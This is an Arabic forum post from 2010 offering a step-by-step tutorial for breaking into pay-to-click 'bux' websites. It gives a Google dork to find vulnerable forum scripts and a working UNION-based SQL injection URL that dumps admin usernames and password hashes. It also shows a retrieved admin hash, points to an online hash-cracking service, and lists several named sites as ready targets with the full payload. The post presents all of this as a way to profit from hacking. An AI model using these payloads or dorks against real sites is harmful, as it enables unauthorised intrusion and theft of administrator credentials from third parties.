[align=center]بسم الله الرحمن الرحيم
الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
لابد انك من قرائتك للعنوان عرفت عن مادا سنتحدت ادن بدون اطالة ندخل للموضوع
ندهب الى موقع البحت قوقل
www.google.co.ma
ناخد الدورك التالي
كود PHP:
inurl:"main_forum.php?cat="
و نحطه في مكان البحث
نلاحض المواقع الكتيرة وكلها تنتهي ب bux دا دليل على انها مواقع ربح
ناخد موقع من النتائج
انا اخترت موقع Alexaclick و نضيف ليه الاستغلال
ليصبح هكدا
كود PHP:
http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins--
الاستغلال
كود PHP:
forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--
فيعطينا النتيجة التالية
الي هي الباس و ايزر
كود PHP:
admin:d6ae89521827cb719f8cf42cdf6e79e0f26a01e3
بس الباس هنا مشفر
لدي الحل
موقع مضمون
www.passcracking.com
ندخل للموقع دا ونضع الشفرة في المكان المخصص
ونضغط على DoIT
و نشوف التيجة ان شاء الله خير
كدا انتهينا من الشرح
و الان بعض المواقع المصابة
كود PHP:
http://www.alexaclix.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat%28aId,0x3a,aUsername,0x3a,apassword%29,3,4,5,6,7+FROM+admins--
gen3bux.com/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--
bpbux.info/forum/main_forum.php?cat=-22+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--
[/align]
avp lfs' geyvm td l,hru vfp hghl,hg (hojvr , hvfp f],k p],]) g,,g
03-24-2010, 03:15 AM
شرح مبسط لثغرة في مواقع ربح الاموال (اخترق و اربح بدون حدود) لوول 
العرض الشجري
المواضيع المتشابهه 
